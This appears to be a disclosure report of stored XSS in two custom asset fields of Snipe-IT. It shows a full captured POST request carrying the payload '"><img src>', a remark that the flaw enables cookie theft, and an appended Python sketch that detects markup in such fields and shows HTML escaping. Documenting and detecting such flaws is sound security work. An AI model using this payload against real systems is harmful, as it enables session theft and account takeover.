Multiple stored XSS in the ‘_snipeit_ram_3’ and ‘_snipeit_cpu_4’ fields of the multipart POST request when creating a new asset or editing an existing asset.
POST /hardware HTTP/1.1
Host: develop.snipeitapp.com
Connection: close
Content-Length: 2560
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: https://develop.snipeitapp.com
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary46mG0KnErxSyjdPS
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://develop.snipeitapp.com/hardware/create
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: snipeitv5demo_session=0Eh7YSRhHibblEqPBiMIwljUeqCKslZfeRVyUL7Y; assetsListingTable.bs.table.pageNumber=1; assetsListingTable.bs.table.searchText=abcde; laravel_token=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%3D; XSRF-TOKEN=eyJpdiI6Ik9jZkdjcmFWazlOd2s0N3ZXRlZsYkE9PSIsInZhbHVlIjoiMWY1MnBuNG9XUnVZQlg4aTZGYXUzVEJ3a1k2ajlLVXBoRkZKKzZacXE0K2xod1JEbkdQSmN1UzVMSnduQ2d2UGRiTm01dUlJK1BhOUxrMGNmVzRBS2hDY2JIK1JVR1ZTRGw5WFZFMDR3VExmaVg1WDY3MjRSbnl2UWRaNkF0WHIiLCJtYWMiOiI0OTM0NGY2MGFjYTU5ODEzYjYxZTNiYjdkNTBjM2RhZDdjNmMxZTAxYmY4MjdmNDFkNjAyYjc4NDU1MmFmNTc2IiwidGFnIjoiIn0%3D

------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="_token"

KqyxmJgNorRhODZo5Inzo4FAzqdOvLscrtYuzbQd
------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="company_id"


------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="asset_tags[1]"

PGS-IT-sdf35777
------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="serials[1]"


------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="model_id"

8
------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="_snipeit_ram_3"

"><img src>
------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="_snipeit_cpu_4"

"><img src>
------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="_snipeit_mac_address_5"

00:00:5e:00:53:af
------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="status_id"

1
------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="checkout_to_type"

user
------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="assigned_user"


------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="assigned_asset"


------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="assigned_location"


------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="name"

abcde
------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="purchase_date"


------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="supplier_id"


------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="order_number"


------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="purchase_cost"


------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="warranty_months"


------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="notes"


------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="rtd_location_id"


------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="image"; filename=""
Content-Type: application/octet-stream


------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="image"; filename=""
Content-Type: application/octet-stream


------WebKitFormBoundary46mG0KnErxSyjdPS--
Payload: "><img src>
This vulnerability can be used to steal a user’s cookie and, with the stolen cookie, gain unauthorized access to that user’s account.
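
An added example, not part of the original report and not Snipe-IT's own code: a Python sketch that parses a constructed multipart body shaped like the request above, flags '_snipeit_*' custom fields carrying markup characters, and shows the stored value rendered with and without HTML escaping. The helper names and the table-cell template are assumptions for illustration; the report does not say where the value is rendered.

```python
import html
import re
from email import message_from_bytes

BOUNDARY = "----WebKitFormBoundary46mG0KnErxSyjdPS"
PAYLOAD = '"><img src>'  # value from the report
# Constructed sample: a subset of the fields in the request above.
FIELDS = [("name", "abcde"), ("_snipeit_ram_3", PAYLOAD),
          ("_snipeit_cpu_4", PAYLOAD), ("_snipeit_mac_address_5", "00:00:5e:00:53:af")]
MARKUP = re.compile(r"[<>\"']")  # characters that can change HTML context


def build_body(fields):
    """Serialize (name, value) pairs as a multipart/form-data body."""
    parts = [f'--{BOUNDARY}\r\nContent-Disposition: form-data; name="{k}"\r\n\r\n{v}\r\n'
             for k, v in fields]
    return ("".join(parts) + f"--{BOUNDARY}--\r\n").encode()


def parse_form(body, boundary):
    """Parse a multipart/form-data body into {field name: value}."""
    head = f'Content-Type: multipart/form-data; boundary="{boundary}"\r\n\r\n'.encode()
    msg = message_from_bytes(head + body)
    return {p.get_param("name", header="content-disposition"): p.get_payload().strip()
            for p in msg.get_payload()}


def flag_custom_fields(form):
    """Return the custom-field names whose values contain markup characters."""
    return sorted(k for k, v in form.items()
                  if k.startswith("_snipeit_") and MARKUP.search(v))


def render_cell(value, escape=True):
    """Hypothetical template: the stored value placed in an attribute and in text."""
    shown = html.escape(value, quote=True) if escape else value
    return f'<td data-value="{shown}">{shown}</td>'


if __name__ == "__main__":
    form = parse_form(build_body(FIELDS), BOUNDARY)
    print("flagged:", flag_custom_fields(form))
    print("unescaped:", render_cell(form["_snipeit_ram_3"], escape=False))
    print("escaped:  ", render_cell(form["_snipeit_ram_3"]))
```

Input flagging like this is a detection aid for logs or a WAF rule; the fix for stored XSS is escaping at output, as the escaped rendering shows.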